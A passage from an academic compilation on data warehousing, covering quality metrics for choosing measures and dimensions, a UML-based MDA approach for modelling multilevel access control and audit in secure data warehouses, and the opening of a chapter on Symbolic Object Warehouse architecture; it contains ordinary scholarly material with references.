schema. More specifically, in the case of DW01 and DW02 the first factor does not influence the evaluation since chosen measures and dimensions are exactly the same. Then, we can easily derive that DW01 results better than DW02 since data stored into the attributes chosen for building the first DW are more suitable to be used for analysis purposes with respect to the ones chosen for the second DW. The evaluation of DW03 as the best DW depends on a multitude of aspects, and to precisely identify the strong points of the third DW it requires to separately analyze each computed index. For example, consider the index concerning the percentage of null values. Although DB03 is the DB characterized by the highest percentage of null values (as reported in Figure 3), the indexes concerning the attributes chosen for building DW03 highlight that these attributes store more valid values with respect to the attributes chosen for building DW01 and DW02. It is important to note that the evaluation of the DWs depends on measures and dimensions chosen to build the DW. Different requisites can lead the expert to change selected measures and dimensions and then our procedure could produce a completely different result. The selection of measures and dimensions is a semantic-dependent task, and our methodology is not designed for replacing the work of the expert (automatically proposing the attributes that are the
Figure 9. Derived quality for dimensions
634
best candidates for dimensions and measures), but our main goal is to propose a set of metrics targeted at helping the expert in selecting appropriate measures and dimensions (especially in the case of multiple choices) during the DW design phase and evaluating the quality of taken design choices at the end of the construction.
CONCLUSION In this article, we have proposed a methodology that can be used (i) during the DW construction phase to drive the selection of measures and dimensions and (ii) to evaluate the final quality of design choices. Proposed methodology is mainly focused on statistical and syntactical aspects of data and can be effectively used paired with semantic-based solutions to support the DW construction and configuration. We have tested proposed metrics on three DWs; the experimental evaluation demonstrated the effectiveness of our methodology in evaluating the DW, e.g., our methodology correctly highlighted some inappropriate initial design choices (e.g., the expert chooses as a measure an attribute characterized by a percentage of null values greater that 90%). The proposed method is actually based on a set of six indexes for attributes and two indexes for tables; although these indexes are able to highlight
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses
attributes that are more suitable to be used as measures and dimensions, in future work we intend to introduce additional indexes characterizing the attributes in order to improve the accuracy of the measurements. We are currently investigating if the conditional entropy and mutual information can be used for automatically discovering correlations among attributes in order to enable our methodology to suggest alternative design choices during the DW creation. For example, an attribute could represent a valid alternative to another attribute if (i) it is strongly correlated with the second attribute and (ii) its quality is higher with respect to the one measured for the second attribute. From this point of view, we are currently evaluating also the possibility of including metrics using information on DB relations (e.g., computing the rate between incoming and outgoing table relations). Finally, we plan to evaluate if an accurate tuning of coefficients allows the procedure to further increase its effectiveness. We have recently started at testing our metrics on completely different contexts for evaluating if its effectiveness is independent from the specific application domain; we then shift from commercial business systems to a DB collecting University examinations and another DB collecting motorways car-crashes. This evaluation is also targeted at highlighting possible limitations of the proposed methodology and can elicit new requirements.
REFERENCES Ballou, D. P., & Pazer, H. L. (1985). Modeling data and process quality in multi-input, multi-output information systems. Management Science, 31(2), 150-162. Ballau, D. P, Wang, R. Y., Pazer, H. L., & Tayi G. K. (1998). Modelling information manufacturing systems to determine information product quality. Management Science, 44(4), 462-484.
Chengalur-Smith, I. N., Ballou, D. P., & Pazer H. L. (1999). The impact of data quality information on decision making: An exploratory analysis. IEEE Transactions on Knowledge and Data Engineering, 11(6), 853-864. English, L. P. (1999). Improving data warehouse & business information quality: Methods for reducing costs and increasing profits. New York: Wiley. Golfarelli, M., Maio, D., & Rizzi, S. (1998). The dimensional fact model: A conceptual model for data warehouses. International Journal of Cooperative Information Systems, 7(2/3), 215-247. Jeusfeld, M. A., Quix, C., & Jarke, M. (1998). Design and analysis of quality information for data warehouses. In Proceedings of the International Conference on Conceptual Modeling (pp. 349-362). Karr, A. F., Sanil, A. P., & Banks, D. L. (2006). Data quality: A statistical perspective. Statistical Methodology, 3(2), 137-173. Kriebel, C. H. (1978). Evaluating the quality of information systems. In Proceedings of the BIFOA Symposium (pp. 18-20). Phipps, C., & Davis, K. (2002). Automating data warehouse conceptual schema design and evaluation. In Proceedings of DMDW (pp. 23-32). Pighin, M., & Ieronutti, L. (2007). From database to datawarehouses: A design quality evaluation. In Proceedings of the International Conference on Enterprise Information Systems (pp. 178-185). Redman, T. C. (1996). Data quality for the information age. Norwood, MA: Artech House. Scannapieco, M., Virgillito, A., Marchetti, C., Mecella, M., & Baldoni, R. (2004). The DaQuinCIS architecture: A platform for exchanging and improving data quality in cooperative information systems. Information Systems, 29(7), 551-582.
635
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses
Wang, R.Y., & Strong D. M. (1996a). Beyond accuracy: What data quality means to data consumers. Journal of Management Information Systems, 12(4), 5-33.
Wang, R.Y., Storey, V. C., & Firth, C. P. (1995). A framework for analysis of data quality research. IEEE Transactions on Knowledge and Data Engineering, 7(4), 623-640.
Wang, R.Y., & Strong D. M. (1996b). Data quality systems evaluation and implementation. London: Cambridge Market Intelligence Ltd.
This work was previously published in International Journal of Data Warehousing and Mining, Vol. 4, Issue 3, edited by D. Taniar, pp. 15-34, copyright 2008 by IGI Publishing (an imprint of IGI Global).
636
637
Chapter 2.12
An MDA Compliant Approach for Designing Secure Data Warehouses Rodolfo Villarroel Universidad Católica del Maule, Chile Eduardo Fernández-Medina Universidad de Castilla-La Mancha, Spain Juan Trujillo Universidad de Alicante, Spain Mario Piattini Universidad de Castilla-La Mancha, Spain
ABSTRACT This chapter presents an approach for designing secure Data Warehouses (DWs) that accomplish the conceptual modeling of secure DWs independently from the target platform where the DW has to be implemented, because our complete approach follows the Model Driven Architecture (MDA) and the Model Driven Security (MDS). In most of real world DW projects, the security aspects are issues that usually rely on the DBMS administrators. We argue that the design of these security aspects should be considered together with the conceptual modeling of DWs from the early stages
of a DW project, and being able to attach user security information to the basic structures of a Multidimensional (MD) model. In this way, we would be able to generate this information in a semi or automatic way into a target platform and the final DW will better suits the user security requirements.
INTRODUCTION The goal of information confidentiality is to ensure that users can only access to the information that they are allowed. In the case of multidimensional
An MDA Compliant Approach for Designing Secure Data Warehouses
(MD) models, confidentiality is crucial, because business information that is very sensitive, can be discovered by executing a simple query. Several papers deal with the importance of security in the software development process. Ghosh, Howell, and Whittaker (2002) state that security must influence all aspects of design, implementation, and software tests. Hall and Chapman (2002) put forward ideas about how to build correct systems that fulfil not only the normal requirements but also the security ones. Nevertheless, security in databases and data warehouses is usually focused on the secure data storage, and not on their design. Thus, a methodology of data warehouse design based on the UML, with the addition of security aspects, would allow us to design DWs with the syntax and power of UML and with the new security characteristics ready to be used whenever the application has security requirements that demand them. In this chapter, we present an approach for designing secure DWs as follows: we define the Model Driven Architecture (MDA) and Model Driven Security (MDS) compliant architecture of our approach, and we provide an Access Control and Audit (ACA) model for the conceptual MD modeling. Then, we extend the Unified Modeling Language (UML) with this ACA model, representing the security information (gathered in the ACA model) in the conceptual MD modeling, thereby allowing us to obtain secure MD models. By using this approach, makes possible to implement the secure MD models with any of the DBMS that are able to implement multilevel databases, such as Oracle Label Security and DB2 Universal Database, UDB. The remainder of this chapter is structured as follows: Next section introduces related work; next, we present the MDA and MDS compliant architecture of our approach. Finally, we present the main conclusions.
638
RELATED WORK As this chapter treats different research topics, the related work is organized as follows.
Multidimensional Modeling Lately, several MD data models have been proposed. Some of them fall into the logical level (such as the well-known star-schema (Kimball & Ross, 2002). Others may be considered as formal models as they provide a formalism for the consideration of the main MD properties. A review of the most relevant logical and formal models can be found in Blaschka, Sapia, Höfling, and Dinter (1998) and Abelló, Samos, and Saltor (2001). In this section, we will only make brief reference to the most relevant models that we consider “pure” conceptual MD models. These models provide a high level of abstraction for the main MD modeling properties at the conceptual level and are totally independent from implementation issues. One outstanding feature provided by these models is that they provide a set of graphical notations (such as the classical and well-known Extended Entity-Relationship model) which facilitates their use and reading. These are as follows: The Dimensional-Fact (DF) Model by Golfarelli, Maio, and Rizzi (1998), The Multidimensional/ER (M/ER) Model by Sapia, Blaschka, Höfling, and Dinter (1998), The starER Model by Tryfona, Busborg, and Christiansen (1999), the Yet Another Multidimensional Model (YAM2) by Abelló et al. (2001), and the model proposed by Trujillo, Palomar, Gómez, and Song (2001). Unfortunately, none of these approaches for MD modeling considers security as an important issue in their conceptual models, and consequently they do not solve the problem of modeling security from the early stages of a DW project.
An MDA Compliant Approach for Designing Secure Data Warehouses
Security Integration into the Design Process There are a few proposals which attempt to integrate security into conceptual modeling, such as the Semantic Data Model for Security (Smith, 1991) and the Multilevel Object Modeling Technique (Marks & Sell, 1996), but they are partial (since they do not cover the complete development process). More recent proposals are UMLSec (Jürjens, 2002) and SecureUML (Lodderstedt, Basin, & Doser, 2002) where UML is extended to develop secure systems. These approaches are interesting, but they only deal with information systems (IS) in general, whilst conceptual database and DW design are not considered. Moreover, a methodology and a set of models have been proposed (Fernández-Medina & Piattini, 2003) in order to design secure databases for implementation with Oracle9i Label Security (OLS). This approach, based on the UML, is relevant because it considers security aspects in all stages of the database development process, from requirement-gathering to implementation. Together with the previous methodology, the proposed Object Security Constraint Language (OSCL), based on the Object Constraint Language (OCL) of UML, allows us to specify security constraints in the conceptual and logical database design process, and to implement them in a specific database management system (DBMS), OLS. Nevertheless, the previous methodology and models do not consider the design of secure MD models for DWs, and therefore, are not appropriate for the representation of the peculiarities of DWs.
Access Control Models Many proposals have been developed with the aim of protecting information against improper disclosure. All of them make use of the particularities of the systems they deal with, such as the types of objects, subjects, privileges, signs, and so on. For instance, there are authorization
models for data archives, database systems, XML documents, distributed hypertext systems, Web services, multimedia documents, and workflows. Nevertheless, although many authorization models that allow a flexible and simple specification of authorizations have been proposed, they rely on the particular properties of the underlying data model. Thus, these authorization models cannot be easily extended to other data models, such as MD modeling.
Security and Access Control Models for Data Warehouses The peculiarity of DWs and the MD model and its terms (facts, dimensions, classification hierarchies, and so on) used for both designing and querying DWs, makes it necessary to deal with specific access control and audit models for DWs. In the literature, we can find several initiatives for the inclusion of security in DWs. Many of them are focused on interesting aspects related to access control, multilevel security, its applications to federated databases, applications using commercial tools, and so on. These initiatives refer to specific aspects that allow us to improve DW security in acquisition, storage, and access aspects. However, none of them considers the security aspects into all stages of the DW development cycle, nor does any examine the introduction of security in the conceptual MD design. On the other hand, there are some interesting proposals which define authorization models for data warehouses, but they only deal with OLAP operations (e.g., roll-up or drill-down) accomplished with OLAP tools. So these are not conceived for their integration in MD modeling as part of the DW design process, and as a consequence, inconsistent security measures might well be defined. We believe that we should consider basic security measures for business DWs with a conceptual model from the early stages of a DW project. Then more specific security rules can be
639
An MDA Compliant Approach for Designing Secure Data Warehouses
defined for particular groups of users in terms of data marts, views, and OLAP tools, or any other analysis tools, but which are consistent with the main security rules defined for the DW. Finally, the work presented in Priebe & Pernul (2001) proposes the definition of basic security measures for main OLAP operations. To this end, authors propose the ADAPTed UML for specifying security measures on a UML class diagram which they use for the MD modeling of OLAP tools at the conceptual level. Although this is an interesting proposal that can be extended and improved, we consider two key aspects that should be given particular attention in this sense. The first of these is that the defined security measures are only based on the OLAP operations that users can carry out by using OLAP tools. The second is that its notation is simple, and rather than being a complete and formal model for data warehouses, we see it as a practical way of modeling simple OLAP scenarios. Some more complex elements of the MD model (e.g., the type of classification hierarchy) have a high impact on security measures, as in data warehouse systems users can access facts by navigating from different classification hierarchy paths, or then again access to facts or dimensions may be denied if users try to access a fine grain (low cardinality). What is more, one fact can be accessed if queried on its own, but access to the same fact can be absolutely forbidden if it is queried in combination with one dimension. Finally, all the above-presented proposals only examine access control, but not audit; so the approach proposed in this chapter is the first one to consider both access model and audit in the multidimensional modeling of DWs at the conceptual level.
AN MDA AND MDS COMPLIANT APPROACH Model Driven Architecture (MDA) is an Object Management Group standard that addresses
640
the complete life cycle of designing, deploying, integrating, and managing applications. MDA (Kleppe, Warmer, & Bast, 2003) separates the specification of system functionality from the specification of the implementation of that functionality on a specific technology platform. Thus, MDA encourages specifying a Platform Independent Model (PIM) by using any specification language. Then, this PIM can be transformed into Platform Specific Models (PSM) in order to be executed on a concrete platform by transforming this PSM into the corresponding Code. We have aligned our approach for the conceptual modeling of DWs with the MDA approach (see Figure 1). Our enriched PIM can be transformed into any logical model representing the multidimensionality of data (e.g., the star schema), and finally this logical model can be transformed into a particular DBMS (e.g., Oracle). On the other hand, Model Driven Security (MDS) is a new approach (Basin, Doser, & Lodderstedt, 2003) for integrating security into the information systems design. This approach considers design models and security models, which are combined, leading to a new kind of model that is called security design model. Our approach has also been aligned with MDS (see Figure 1). We have considered a Raw PIM, which is the design model. This model does not contain security details, and is used for the conceptual modeling of DWs. Moreover, we have defined our ACA model, that is completely independent from the design model (and of course it is independent from the target platform, so in some sense is another PIM) and, in MDS terminology, is the security model. This independence is highly important, because we could use this security model together with other DW conceptual models. Combining both the design model and the security model, an enriched PIM is performed. This security design model is a DW conceptual model that also contains the security details that can be specified with our ACA model. The design model
An MDA Compliant Approach for Designing Secure Data Warehouses
Figure 1. Merging the UML extension and the ACA Model into one PIM MDA MDS Definition
Raw PIM
ACA model
Integration
Enriched PIM
PSM1
Code1
Code2
PSM2
Code3
must usually be extended to be able to represent the security details. Therefore, this enriched PIM with all the security information is the model that will participate in the MDA architecture in the upcoming transformations. Raw PIM. Next, we outline the approach, based on the UML, we use for DW conceptual modeling (Lujan-Mora, Trujillo, & Song, 2002; Trujillo et al., 2001). This approach has been specified by means of a UML profile that contains the necessary stereotypes in order to carry out the MD modeling at the conceptual level successfully. In this approach, structural properties of MD modeling are represented by means of a UML class diagram in which the information is clearly organized into facts (items of interest for an enterprise) and dimensions (context in which facts have to be analyzed). Facts and dimensions are represented by means of fact classes (stereotype Fact) and dimension classes (stereotype Dimension) respectively. Fact classes are defined as composite classes in shared aggregation relationships of n dimension classes
…
PSMn
…
Codem
(see Figure 2). The minimum multiplicity in the role of the dimension classes is 1 (all the facts must always be related to all dimensions). A fact is composed of measures or fact attributes. By default, all measures in the fact class are considered to be additive. With respect to dimensions, each level of a classification hierarchy is specified by a base class (stereotype Base). An association of base classes specifies the relationship between two levels of a classification hierarchy. Every base class must also contain an identifying attribute (OID) and a descriptor attribute (stereotype D). These attributes are necessary for an automatic generation process into commercial OLAP tools, as these tools store this information on their metadata. Access Control and Audit (ACA) Model. Although there are many authorization models that allow a flexible and easy specification of authorizations, they rely on the particular properties of the underlying data model. As a result, these authorization models cannot be easily extended to other data models, such as the MD modeling.
641
An MDA Compliant Approach for Designing Secure Data Warehouses
Figure 2. Multidimensional modeling using the UML Sales OID ticket_number FA qty FA price FA inventory
*
*
*
1
1
1..* Time
Product
OID time_code D day DA qty DA working DA day_number
OID product_code D name DA color DA size DA weight
Store OID store_code D name DA address DA telephone
* 1 Category
Month
OID category_code D name
OID month_code D name
City OID city_code D name DA population
1 Quarter OID quarter_code D description
Semester OID semester_code D description
*
Department OID department_code D name
Country OID country_code D name DA population
Year OID year_code D description
Access control is not a complete solution for securing a system as it must be coupled with auditing. Auditing requires the recording of all user requests and activities for their later analysis. Therefore, in our approach, we take both concepts into consideration for their integration in the conceptual MD modeling design. Access control models are typically composed of a set of authorization rules that regulate accesses to objects. Each authorization rule usually specifies the subject to which the rule applies, the object to which the authorization refers, the action to which the rule refers, and the sign describing whether the rule permits or denies the access. In order to regulate access to objects in a MD model, we have considered the Mandatory Access Control model (in the form of multilevel security policies), which is based on the classification of subjects and objects in the system. So, our access control and audit model allows us to specify sensitivity information assignment rules for all elements of MD models (facts, dimensions, etc.), which define static and dynamic object classification. Moreover, our model allows us to define authorization rules that represent exceptions to the general multilevel rules, where the designer can
642
specify different situations in which the multilevel rules are not sufficient. Finally, a set of audit rules, which represent the corresponding audit requirements, can be included in the model. In multilevel policies, an access class is assigned to each object and subject. The most common access class is defined as a security level and a set of categories. The security level is an element of a hierarchically ordered set, such as Top Secret (TS), Secret (S), Confidential (C), and Unclassified (U), where, TS > S > C > U. The set of categories is a subset of an unordered set, whose elements reflect functional, or competence, areas. The access class is one element of a partially-ordered set of classes, where an access class c1 dominates an access class c2 iff the security level of c1 is greater than or equal to that of c2 and the categories of c1 include those of c2. We have considered a secrecy-based mandatory policy, so the two principles that must be satisfied to protect information confidentiality are: i) no-read-up (a subject is allowed a read-access to an object only if the access class of the subject dominates the access class of the object), and ii) no-write-down (a subject is allowed a write-access to an object only if the access class of the subject is dominated by the access class of the object).
An MDA Compliant Approach for Designing Secure Data Warehouses
In our model, we define an access class on the basis of three different but compatible ways of classifying users; by their security level, the user role they play and by the user compartments they belong to: • •
•
Security levels: This indicates the clearance level of the user. Security user roles: Used by a company to organize users in a hierarchical role structure, according to the responsibilities of each type of work. Each user can play more than one role. Security user compartments: Also used by an organization to classify users into a set of horizontal compartments or groups, such as geographical location, area of work, and so on. Each user can belong to one or more compartments.
Therefore, in our model, the access class is one element of a partially ordered set of classes, where an access class c1 dominates an access class c2 iff the security level of c1 is greater than or equal to that of c2, the compartments of c1 include those of c2, and at least one of the user roles of c1 (or one of its ascendant) is defined for c2. Thus, for each object in the model, the user access requirements (security level, user roles, and user compartments) can be defined, thereby specifying with high accuracy which users can access each particular object. Enriched PIM. The goal of this UML extension is to be able to design MD conceptual model, but classifying the information in order to define which properties has to own the user to be entitled to access the information. So, we have to consider three main stages: •
Defining precisely the organization of users that will have access to the MD system. We can define a precise level of granularity considering three ways of organizing users:
•
•
Security hierarchy levels (which indicate the clearance level of the user), user Compartments (which indicate a horizontal classification of users), and user Roles (which indicate a hierarchical organization of users according to their roles or responsibilities within the organization) Classifying the information into the MD model. We can define for each element of the model (fact class, dimension class, fact attribute, etc.) its security information, specifying a sequence of security levels, a set of user compartments, and a set of user roles. We can also specify security constraints considering these security attributes. The security information and constraints indicate the security properties that users have to own to be able to access the information. Enforcing the mandatory access control. The typical operations that final users can execute in this type of systems are query operations. So, the mandatory access control has to be enforced for read operations. The access control rule for read operations is as follows: A user can access information only if, a) the security level of the user is greater than or equal to the security level of the information, b) all the user compartments that have been defined for the information are owned by the user, and, c) at least one of the user roles that the information has defined, is played by the user.
In this chapter, we will only focus on the second stage by defining a UML extension that allows us to classify the security elements in a conceptual MD model and to specify security constraints. According to Conallen (2000), an extension to the UML begins with a brief description and then lists and describes all the stereotypes, tagged values, and constraints of the extension. In addition to these elements, an extension contains a set of well-formedness rules. These rules are used
643
An MDA Compliant Approach for Designing Secure Data Warehouses
to determine whether a model is semantically consistent with itself. According to this quote, we define our UML extension for secure conceptual MD modeling following the schema composed of these elements: • •
• •
•
For the definition of the stereotypes, we follow the structure that is suggested in Gogolla & Henderson-Sellers (2002), which is composed of a name, the base metaclass, the description, the tagged values and a list of constraints defined by means of OCL. For the definition of tagged values, the type of tagged values, the multiplicity, the description, and the default value are defined. Basically, we have reuse the previous profile defined in Lujan-Mora et al. (2002), which allow us to design DWs from a conceptual perspective, and we have added the required elements that we need to specify the security aspects (Subjects, Objects, Actions, Sensitive Information Assignment Rules, Authorization Rules, and Audit Rules) considered in our ACA model. We define a set of tagged values, stereotypes, and constraints, which enables us to create secure MD models. Figure 3 shows an MD model with security information and constraints. We use several tagged values to allow
Description (a brief description of the extension in natural language), Prerequisite extensions (this element indicates whether the current extension needs the existence of previous extensions), Stereotypes / tagged values (the definition of the stereotypes and / or tagged values), Well-formedness rules (the static semantics of the metaclasses are defined both in natural language and as a set of invariants defined by means of OCL expressions), and Comments (any additional comment, decision or example, usually written in natural language).
Figure 3. Example of MD model with security information and constraints
1
UserProfile
{involvedClasses = (Diagnosis , Diagnosis_group & Patient)} self.SL = (If self.Diagnosis.Diagnosis_group.description = "cancer" or self.Diagnosis.Diagnosis_group.description= "AIDS" then TS else S )
userCode name securityLevel securityRoles citizenship hospital workingArea dateContract
2
{involvedClasses= (Patient)} self.SL = (if self.cost>10000 then TS else S)
Admission {SL=S..TS; SR=Health, Admin} type cost {SR = Admin}
An MDA Compliant Approach for Designing Secure Data Warehouses
us to model all our rules of the ACA model. The MD model in Figure 3 includes a fact class (Admission), two dimensions (Diagnosis and Patient), two base classes (Diagnosis_group and City), and a class (UserProfile). UserProfile class (stereotype UserProfile) contains the information of all users who will have access to this multidimensional model. Admission fact class -stereotype Fact- contains all individual admissions of patients in one or more hospitals, and can be accessed by all users who have secret or top secret security levels -tagged value SecurityLevels (SL) of classes-, and play health or administrative roles -tagged value SecurityRoles (SR) of classes-. Note that the cost attribute can only be accessed by users who play administrative role -tagged value SR of attributes- Patient dimension contains the information of hospital patients, and can be accessed by all users who have secret security level—tagged value SL-, and play health or administrative roles—tagged value SR-. The Address attribute can only be accessed by users who play administrative role—tagged value SR of attributes-. City base class contains the information of cities, and it allows us to group patients by cities. Cities can be accessed by all users who have confidential security level—tagged value SL-. Diagnosis dimension contains the information of each diagnosis, and can be accessed by users who play health role—tagged value SR-, and have secret security level—tagged value SL-. Finally, Diagnosis_group contains a set of general groups of diagnosis. Each group can be related to several diagnoses, but a diagnosis will always be related to a group. Diagnosis groups can be accessed by all users who have confidential security level—tagged value SLs-. Several security constraints have been specified by using the previously defined constraints, stereotypes, and tagged values. Each security rule is first defined in natural language, then we specify the corresponding ACA rule, y finally we indicate the place this rule is specified in the secure MD conceptual model. For example:
Rule 1: For each instance of the fact class Admission, the security level will be at least Secret, and the security roles will be Health and Admin. ACA rule: OBJECTS MDCL Admission SECINF SL Secret SR Health Admin Secure MD Model: See Admission fact class and tagged-values SL and SR.
CONCLUSION In this chapter, we have aligned our approach for the conceptual modeling of DWs with the MDA approach. Thus, as we have shown throughout the chapter, the secure conceptual modeling of the DW itself is accomplished by using a UML profile without considering any implementation aspect on a concrete target platform. Then, the resulting PIM can be transformed into any logical model representing the multidimensionality of data (e.g., the star schema), y finally this logical model can be transformed into a particular DBMS (e.g., Oracle). A relevant advantage of this approach is that it uses the UML, a widely-accepted object-oriented modeling language, which saves developers from learning a new model and its corresponding notations for specific MD modeling. Furthermore, the UML allows us to represent some MD properties that are hardly considered by other conceptual MD proposals. Our work for the immediate future consists of developing an automated tool that allow us not only to model data warehouses in a secure way, using our profile, but also to translate as well as validate all our OCL sentences specified in the modeling. Furthermore, our proposal will be tested in a real environment in order to acquire empirical experience, and to obtain results of its efficiency.
645
An MDA Compliant Approach for Designing Secure Data Warehouses
REFERENCES Abelló, A., Samos, J., & Saltor, F. (2001). A framework for the classification and description of multidimensional data models. Proceedings of 12th International Conference on Database and Expert Systems Applications (DEXA’01), Springer-Verlag LNCS 2113, Munich, Germany, pp. 668-677. Basin, D., Doser, J., & Lodderstedt, T. (2003). Model driven security: From UML models to access control infrastructures. ETH Zürich. Blaschka, M., Sapia, C., Höfling, G., & Dinter, B. (1998). Finding your way through multidimensional data models. Proceedings of 9th International Conference on Database and Expert Systems Applications (DEXA’98). LNCS, 1460, SpringerVerlag, Vienna, Austria, pp. 198-203. Conallen, J. (2000). Building Web applications with UML. Addison-Wesley. Fernández-Medina, E. & Piattini, M. (2003). Designing secure database for OLS. Database and expert systems applications: 14th international conference (DEXA 2003), Prague, Czech Republic, Springer-Verlag. Ghosh, A., Howell, C., & Whittaker, J. (2002). Building software securely from the ground up. IEEE Software, 19(1), 14-16. Gogolla, M. & Henderson-Sellers, B. (2002). Analysis of UML stereotypes within the UML metamodel. 5th International Conference on the Unified Modeling Language - The Language and its Applications, Dresden, Germany, Springer, LNCS. Golfarelli, M., Maio, D., & Rizzi, S. (1998). Conceptual design of data warehouses from E/R schemes. 32th Hawaii International Conference on Systems Sciences (HICSS 1998), Hawaii, USA, IEEE Computer Society.
646
Hall, A., & Chapman, R. (2002). Correctness by construction: developing a commercial secure system. IEEE Software, 19(1), 18-25. Jürjens, J. (2002). UMLsec: Extending UML for secure systems development. UML 2002 - The Unified Modeling Language, Model engineering, concepts and tools. Jézéquel, J., Hussmann, H. & Cook, S. Dresden, Germany, Springer: 412-425. Kimball, R. & Ross, M. (2002). The data warehousing toolkit. 2nd ed. John Wiley. Kleppe, A., Warmer, J. & Bast, W. (2003). MDA explained. The model driven architecture: Practice and promise. Addison-Wesley. Lodderstedt, T., Basin, D. & Doser, J. (2002). SecureUML: A UML-based modeling language for model-driven security. 5th International Conference on the Unified Modeling Language (UML 2002), Dresden, Germany: Springer-Verlag. Luján-Mora, S., Trujillo, J. & Song, I. Y. (2002). Extending the UML for multidimensional modeling. 5th International Conference on the Unified Modeling Language (UML 2002), Dresden, Germany: Springer-Verlag. Marks, D., Sell, P., & Thuraisingham, B. (1996). MOMT: A multi-level object modeling technique for designing secure database applications. Journal of Object-Oriented Programming, 9(4), 22-29. Priebe, T. & Pernul, G. (2001). A pragmatic approach to conceptual modeling of OLAP security. 20th International Conference on Conceptual Modeling (ER 2001). Yokohama, Japan: SpringerVerlag. Sapia, C., Blaschka, M., Höfling, G., & Dinter, B. (1998). Extending the E/R model for the multidimensional paradigm. 1st International Workshop on Data Warehouse and Data Mining (DWDM’98). Singapore: Springer-Verlag.
An MDA Compliant Approach for Designing Secure Data Warehouses
Smith, G.W. (1991). Modeling security-relevant data semantics. IEEE Transactions on Software Engineering, 17(11), 1195-1203. Trujillo, J., Palomar, M., Gómez, J., & Song, I. Y. (2001). Designing data warehouses with OO conceptual models. IEEE Computer, Special issue on Data Warehouses, (34), 66-75. Tryfona, N., Busborg, F., & Christiansen, J. (1999). starER: A conceptual model for data warehouse design. ACM 2nd International Workshop on Data Warehousing and OLAP (DOLAP’99), Missouri, USA.
KEY TERMS Access Control: Determines what one party will allow another one to do with respect to resources and objects mediated by the former. Access control models are typically composed of a set of authorization rules that regulate access to objects. Each authorization rule usually specifies the subject to which the rule applies, the object to which the authorization refers, the action to which the rule refers, and the sign describing whether the rule states a permission or a denial for the access. Audit Process: Gathers data about activities in the system and analyzes it to discover security violations or diagnose their cause.
Data Warehouse (DW): A subject-oriented, integrated, time-variant, non-volatile collection of data in support of management’s decisionmaking process. Model Driven Architecture (MDA): An Object Management Group (OMG) standard that addresses the complete life cycle of designing, deploying, integrating, and managing applications. Model Driven Security (MDS): A new approach for integrating security into the information systems design. This approach considers design models and security models, which are combined, leading to a new kind of models that is called security design model. Multilevel Databases: Databases that contain objects with different levels of confidentiality and register subjects with different abilities. Security: The capability of a software product to protect data and information in order to avoid that unauthorized individuals or systems are able to read and modify them and not to deny access to authorized staff. UML Profile: A set of improvements that extend an existing UML type of diagram for a different use. These improvements are specified by means of the extendibility mechanism provided by UML (stereotypes, properties and constraints) in order to be able to adapt it to a new method or model.
This work was previously published in Handbook of Research on Information Security and Assurance, edited by J.N.D. Gupta and S.K. Sharma, pp. 495-503, copyright 2009 by Information Science Reference (an imprint of IGI Global).
647
648
Chapter 2.13
Architecture for Symbolic Object Warehouse Sandra Elizabeth González Císaro Universidad Nacional del Centro de la Provincia de Buenos Aires, Argentina Héctor Oscar Nigro Universidad Nacional del Centro de la Provincia de Buenos Aires, Argentina
INTRODUCTION Much information stored in current databases is not always present at necessary different levels of detail or granularity for Decision-Making Processes (DMP). Some organizations have implemented the use of central database - Data Warehouse (DW) - where information performs analysis tasks. This fact depends on the Information Systems (IS) maturity, the type of informational requirements or necessities the organizational structure and business own characteristic. A further important point is the intrinsic structure of complex data; nowadays it is very common to work with complex data, due to syntactic or semantic aspects and the processing type (Darmont et al., 2006). Therefore, we must design systems, which can to maintain data complexity to improve the DMP. OLAP systems solve the problem of present different aggregation levels and visualization for
multidimensional data through cube’s paradigm. The classical data analysis techniques (factorial analysis, regression, dispersion, etc.) are applied to individuals (tuples or individuals in transactional databases). The classic analysis objects are not expressive enough to represent tuples, which contain distributions, logic rules, multivaluate attributes, and intervals. Also, they must be able to respect their internal variation and taxonomy maintaining the dualism between individual and class. Consequently, we need a new data type holding these characteristics. This is just the mathematical concept model introduced by Diday called Symbolic Object (SO). SO allows modeling physic entities or real world concepts. The former are the tuples stored in transactional databases and the latter are high entities obtained from expert’s analysis, automatic classification or some particular aggregation taken from analysis units (Bock & Diday, 2000).
The SO concept helps construct the DW and it is an important development for Data Mining (DM): for the manipulation and analysis of aggregated information (Nigro & González Císaro, 2005). According to Calvanese, data integration is a central problem in the design of DWs and Decision Support Systems (Calvanese, 2003; Cali, et al., 2003); we make the architecture for Symbolic Object Warehouse construction with integrative goal. Also, it combines with Data Analysis tasks or DM. This paper is presented as follows: First, Background: DW concepts are introduced. Second, Main Focus divided into: SOs Basic Concepts, Construing SOs and Architecture. Third, Future Trends, Conclusions, References and Key Terms.
Background The classical definition given by the theme’s pioneer is “a Data Warehouse is a subject-oriented, integrated, time-variant, and non-volatile collection of data in support of management’s Decision-Making Process” (Inmon, 1996). The fundamental purpose of a DW is to empower the business staff with information that allows making decisions based on consolidated information. In essence, a DW is in a continuous process of transformation as regards information and business rules; both of them must be considered at design time to assure increase robustness and flexibility of the system. Extraction, Transformation and Load (ETL) constitute the fundamental process in the DW. It is liable for the extraction of data from several sources, their cleansing, customization and insertion into a DW (Simitsis, et al., 2005). When complex data is involved, this process becomes difficult, because of the integration of different semantics (especially with text data, sound, images, etc) or complex structures. So, it is necessary to include integration functions able to join and to merge them.
Metadata management, in DW construction, helps the user understand the stored contents. Information about the meaning of data elements and the availability of reports are indispensable to successfully use the DW. The generation and management of metadata serve two purposes (Staudt et al., 1999): 1. 2.
To minimize the efforts for development and administration of a DW To improve the extraction from it.
Web Warehouse (WW) is a major topic widely researched and developed (Han & Kamber, 2001), as a result of the increasing and intensive use in e-commerce and e-business applications. WW tools and applications are morphing into enterprise portals and analytical applications are being extended to transactional systems. With the same direction, the audiences for WW have expanded as analytical applications have rapidly moved (indirectly) into the transactional world ERP, SCM and CRM (King, 2000). Spatial data warehousing (SDW) responds to the need of providing users with a set of operations for easily exploring large amounts of spatial data, as well as for aggregating spatial data into synthetic information most suitable for decision-making (Damiani & Spaccapietra, 2006). Gorawski & Malczok (2004) present a distributed SDW system designed for storing and analyzing a wide range of spatial data. The SDW works with the new data model called cascaded star model that allows efficient storing and analyzes of huge amounts of spatial data.
MAIN FOCUS SOs Basic Concepts Formally, a SO is a triple s = (a, R, d) where R is a relation between descriptions, d is a description and “a” is a mapping defined from Ω(discourse
649
Architecture for Symbolic Object Warehouse
